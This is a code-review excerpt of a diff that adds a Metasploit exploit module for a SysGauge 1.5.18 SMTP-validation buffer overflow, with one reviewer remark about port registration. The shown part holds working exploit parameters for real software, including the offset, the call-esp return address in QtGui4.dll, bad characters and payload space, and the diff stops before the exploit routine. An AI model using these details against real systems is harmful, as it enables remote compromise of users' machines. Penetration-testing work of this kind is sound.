modules/exploits/windows/smtp/sysgauge_client_bof.rb

```diff
@@ -0,0 +1,89 @@
+
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
+# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
+#
+##
+
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::TcpServer
+
+  Rank = NormalRanking
+
+  def initialize()
+    super(
+      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
+      'Description'    => %q{
+        This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
+        via its SMTP server validation. The module sends a malicious response along in the
+        220 service ready response and exploits the client resulting in an unprivileged shell.
+      },
+      'Author'         =>
+      [
+        'Chris Higgins', # msf Module -- @ch1gg1ns
+        'Peter Baris'
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+      [
+        [ 'EDB', '41479' ],
+      ],
+      'DefaultOptions' =>
+      {
+        'EXITFUNC' => 'thread'
+      },
+      'Payload'        =>
+      {
+        'Space' => 306,
+        'Smallest' => true,
+        'BadChars' => "\x00\x0a\x0d\x20"
+      },
+      'Platform'  => 'win',
+      'Targets'       =>
+      [
+        [ 'Windows Universal',
+          {
+            'Offset' => 176,
+            'Ret'    => 0x6527635E # call esp # QtGui4.dll
+          }
+        ]
+      ],
+      'Privileged'    => 'false',
+      'DisclosureDate' => 'Feb 28 2017',
+      'DefaultTarget' => 0
+      )
+    register_options(
+      [
+      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
```

Comment:
Technically, this is already registered when you included `TcpServer`. You can set it as a `DefaultOption`.